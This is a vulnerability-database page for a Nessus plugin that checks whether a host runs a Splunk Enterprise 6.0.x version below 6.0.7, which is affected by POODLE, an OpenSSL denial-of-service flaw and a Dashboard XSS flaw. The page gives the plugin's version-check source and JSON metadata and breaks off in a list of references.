Search...

Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)

2014-12-04T00:00:00

ID SPLUNK_607.NASL
Type nessus
Reporter Tenable
Modified 2018-07-30T00:00:00

Description

According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :

A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566)

A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)

A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(79723);
  script_version("1.13");
  script_cvs_date("Date: 2018/07/30 15:31:31");

  script_cve_id("CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466");
  script_bugtraq_id(70574, 70586, 71257);
  script_xref(name:"CERT", value:"577193");

  script_name(english:"Splunk Enterprise 6.0.x &lt; 6.0.7 Multiple Vulnerabilities (POODLE)");
  script_summary(english:"Checks the version of Splunk Enterprise.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains an application that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its version number, the Splunk Enterprise hosted on the
remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected
by the following vulnerabilities :

  - A man-in-the-middle (MitM) information disclosure
    vulnerability, known as POODLE, exists due to the way
    SSL 3.0 handles padding bytes when decrypting messages
    encrypted using block ciphers in cipher block chaining
    (CBC) mode. A MitM attacker can decrypt a selected byte
    of a cipher text in as few as 256 tries if they are able
    to force a victim application to repeatedly send the
    same data over newly created SSL 3.0 connections.
    (CVE-2014-3566)

  - A flaw exists in the included OpenSSL library due to
    handling session tickets that have not been properly
    verified for integrity. A remote attacker, by using a
    large number of invalid session tickets, can exploit
    this to cause a denial of service. (CVE-2014-3567)

  - A cross-site scripting flaw exists within the Dashboard
    due to improperly validating input. This allows a
    remote attacker, using a specially crafted request, to
    execute arbitrary script code in the user's browser
    session within the trust relationship. (CVE-2014-5466)

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"http://www.splunk.com/view/SP-CAAANST");
  script_set_attribute(attribute:"see_also", value:"https://www.imperialviolet.org/2014/10/14/poodle.html");
  script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/~bodo/ssl-poodle.pdf");
  script_set_attribute(attribute:"see_also", value:"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Splunk Enterprise 6.0.7 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/10/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/11/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/12/04");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:splunk:splunk");

  script_set_attribute(attribute:"in_the_news", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.");

  script_dependencies("splunkd_detect.nasl","splunk_web_detect.nasl");
  script_require_ports("Services/www", 8089, 8000);
  script_require_keys("installed_sw/Splunk");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "Splunk";

get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:8000, embedded:TRUE);

install = get_single_install(
  app_name : app,
  port     : port,
  exit_if_unknown_ver : TRUE
);

dir = install['path'];
ver = install['version'];

install_url = build_url(qs:dir, port:port);

# Affected : 6.0.x &lt; 6.0.7
if (ver =~ "^6\." && ver_compare(ver:ver,fix:"6.0.7",strict:FALSE) &lt; 0)
{
  set_kb_item(name:"www/"+port+"/XSS", value:TRUE);

  if (report_verbosity &gt; 0)
  {
    report =
      '\n  URL               : ' +install_url+
      '\n  Installed version : ' +ver+
      '\n  Fixed version     : 6.0.7\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);

JSON Vulners Source

Initial Source

{"id": "SPLUNK_607.NASL", "bulletinFamily": "scanner", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2014-12-04T00:00:00", "modified": "2018-07-30T00:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "reporter": "Tenable", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "type": "nessus", "lastseen": "2018-07-31T10:13:02", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 1, "enchantments": {}, "hash": "01109816c3e81f11cb8ea5bf0e0e83b974b1674032b89918135b9d194859f619", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "bf85ac661e90f76efc3e3b625164c738", "key": "cvss"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8c669a229bb7e8ad8fcc835ab88c475a", "key": "modified"}, {"hash": "1c7c27e5a9a4e7d2dbe4b31afa5c224f", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "3f4e1c2fc418f5abbca00df2677c178c", "key": "references"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2016-09-26T17:25:49", "modified": "2016-05-12T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:55:05 $\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_osvdb_id(113251, 113374);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:TF/RC:UR\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 19}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:49"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:splunk:splunk"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "7eb6a3edb5fe208ee93b545aa3f5563d53484c335f516c7c4bbffea0a1067ad5", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "bf85ac661e90f76efc3e3b625164c738", "key": "cvss"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8c669a229bb7e8ad8fcc835ab88c475a", "key": "modified"}, {"hash": "8f041c0fcda52146c962a2af67d7c713", "key": "cpe"}, {"hash": "1c7c27e5a9a4e7d2dbe4b31afa5c224f", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "3f4e1c2fc418f5abbca00df2677c178c", "key": "references"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2017-10-29T13:42:32", "modified": "2016-05-12T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:55:05 $\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_osvdb_id(113251, 113374);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:TF/RC:UR\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 36}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:42:32"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "8f041c0fcda52146c962a2af67d7c713"}, {"key": "cvelist", "hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec"}, {"key": "cvss", "hash": "bf85ac661e90f76efc3e3b625164c738"}, {"key": "description", "hash": "0e449fd9289d8f4e11f313fe030324e3"}, {"key": "href", "hash": "1733151b4856719fe7e98a26d6fa0f38"}, {"key": "modified", "hash": "3b33040e1ee70c0673ab567f99a67d3f"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "c4d155f2fb5bf679bbf0c9e946c335a9"}, {"key": "published", "hash": "ecb1793a25109af820fda53b11964ff5"}, {"key": "references", "hash": "3f4e1c2fc418f5abbca00df2677c178c"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "96b871079f24288bf32a59eb920d6ad4"}, {"key": "title", "hash": "1d36f533639d3922864e792e229da60d"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f0d18187296d718314f68012f5ef0ffcb24d42dce7471cb9e20c8d626ccbda73", "viewCount": 37, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/30 15:31:31\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "naslFamily": "CGI abuses", "pluginID": "79723", "cpe": ["cpe:/a:splunk:splunk"]}

{"result": {"cve": [{"lastseen": "2018-08-14T11:22:34", "references": ["https://www-01.ibm.com/support/docview.wss?uid=swg21688165", "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html", "http://www-01.ibm.com/support/docview.wss?uid=swg21687172", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html", "http://support.citrix.com/article/CTX200238", "http://www-01.ibm.com/support/docview.wss?uid=swg21687611", "http://www.securitytracker.com/id/1031105", "http://downloads.asterisk.org/pub/security/AST-2014-011.html", "http://marc.info/?l=bugtraq&m=142354438527235&w=2", "http://marc.info/?l=bugtraq&m=142721887231400&w=2", "http://marc.info/?l=bugtraq&m=142350743917559&w=2", "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle", "http://www.securitytracker.com/id/1031132", "http://rhn.redhat.com/errata/RHSA-2015-1546.html", "https://support.citrix.com/article/CTX216642", "https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip", "http://marc.info/?l=bugtraq&m=141715130023061&w=2", 